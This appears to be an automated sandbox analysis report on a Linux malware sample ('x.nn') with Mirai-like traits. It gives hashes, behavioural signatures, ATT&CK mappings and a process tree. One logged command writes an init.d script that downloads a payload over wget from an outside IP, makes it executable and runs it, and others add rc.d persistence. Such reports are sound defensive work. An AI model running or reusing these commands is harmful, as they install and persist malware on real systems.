Analysis

max time kernel: 149s
max time network: 150s
platform: ubuntu-22.04_amd64
resource: ubuntu2204-amd64-20240611-en
resource tags: arch:amd64, arch:i386, image:ubuntu2204-amd64-20240611-en, kernel:5.15.0-105-generic, locale:en-us, os:ubuntu-22.04-amd64, system
submitted: 08/09/2024, 18:29
Static task: static1
Behavioral task: behavioral1
Sample: x.nn
Resource: ubuntu2204-amd64-20240611-en
General

Target: x.nn
Size: 76KB
MD5: 973a64d7c0dfa2aa3fdeeed0b15b14bb
SHA1: 9533d5194a3d9c6ced530a2f300f0edfa5cccb69
SHA256: 15d168a0a401611890ff27e5cc69edde969d42defa25a82758d8401804bc04ec
SHA512: 028b138d464485de35094f3754ff6a3d917a50181cd28f1633fa5fb2bc672bcc739dfdd2cdccde1b7393c8caf3009bb58383775d591de8caea9f96c7caaa1079
SSDEEP: 1536:/l1h73pl93YNjnYhd0t++IXonF9dzeet7TxOrQy:tb0jnYhd7ovtD/mQy
Malware Config
Signatures

Creates a large amount of network flows (1 TTPs)
This may indicate a network scan to discover remotely running services.

File and Directory Permissions Modification (1 TTPs, 3 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
pid    Process
1574   sh
1575   sh
1576   chmod

Modifies Watchdog functionality (1 TTPs, 2 IoCs)
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description                    ioc                  Process
File opened for modification   /dev/watchdog        x.nn
File opened for modification   /dev/misc/watchdog   x.nn

description                    ioc                  Process
File opened for modification   /etc/init.d/x.nn     sh

Modifies rc script (2 TTPs, 1 IoCs)
Adding/modifying system rc scripts is a common persistence mechanism.
description                    ioc                  Process
File opened for modification   /etc/rc.local        x.nn

Changes its process name (1 IoCs)
description                                                       ioc             pid    Process
Changes the process name, possibly in an attempt to hide itself   /var/igorilla   1572   x.nn

description               ioc                 Process
File opened for reading   /proc/filesystems   mkdir
Processes

/tmp/x.nn
  command line: /tmp/x.nn
  - Modifies Watchdog functionality
  - Modifies rc script
  - Changes its process name
  PID: 1572

  /bin/sh
    command line: sh -c "echo \"#!/bin/sh # /etc/init.d/x.nn case \\\"\$1\\\" in start) echo 'Starting x.nn' /tmp/x.nn & wget http://45.202.35.35/lol -O /tmp/lol chmod +x /tmp/lol /tmp/lol & ;; stop) echo 'Stopping x.nn' killall x.nn ;; restart) \$0 stop \$0 start ;; *) echo \\\"Usage: \$0 {start|stop|restart}\\\" exit 1 ;; esac exit 0\" > /etc/init.d/x.nn"
    - File and Directory Permissions Modification
    - Modifies init.d
    PID: 1574

  /bin/sh
    command line: sh -c "chmod +x /etc/init.d/x.nn"
    - File and Directory Permissions Modification
    PID: 1575

    /usr/bin/chmod
      command line: chmod +x /etc/init.d/x.nn
      - File and Directory Permissions Modification
      PID: 1576

  /bin/sh
    command line: sh -c "mkdir -p /etc/rc.d"
    PID: 1577

    /usr/bin/mkdir
      command line: mkdir -p /etc/rc.d
      - Reads runtime system information
      PID: 1578

  /bin/sh
    command line: sh -c "ln -s /etc/init.d/x.nn /etc/rc.d/S99x.nn"
    PID: 1579

    /usr/bin/ln
      command line: ln -s /etc/init.d/x.nn /etc/rc.d/S99x.nn
      PID: 1580
Network

MITRE ATT&CK Enterprise v15

Persistence
  Boot or Logon Autostart Execution (2)
  Boot or Logon Initialization Scripts (2)
  RC Scripts (2)

Privilege Escalation
  Boot or Logon Autostart Execution (2)
  Boot or Logon Initialization Scripts (2)
  RC Scripts (2)
Downloads

Filesize: 53B
MD5: 2bd9b4be30579e633fc0191aa93df486
SHA1: 7d63a9bd9662e86666b27c1b50db8e7370c624ff
SHA256: 64dc39f3004dc93c9fc4f1467b4807f2d8e3eb0bfa96b15c19cd8e7d6fa77a1d
SHA512: ae6dd7b39191354cf43cf65e517460d7d4c61b8f5c08e33e6ca3c451dc7cab4de89f33934c89396b80f1aade0a4e2571bd5ae8b76ef80b737d4588703d2814d5